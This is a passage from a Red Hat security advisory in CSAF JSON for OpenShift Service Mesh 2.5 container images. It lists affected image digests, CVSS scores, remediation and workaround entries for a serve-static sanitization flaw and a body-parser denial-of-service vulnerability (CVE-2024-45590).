"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
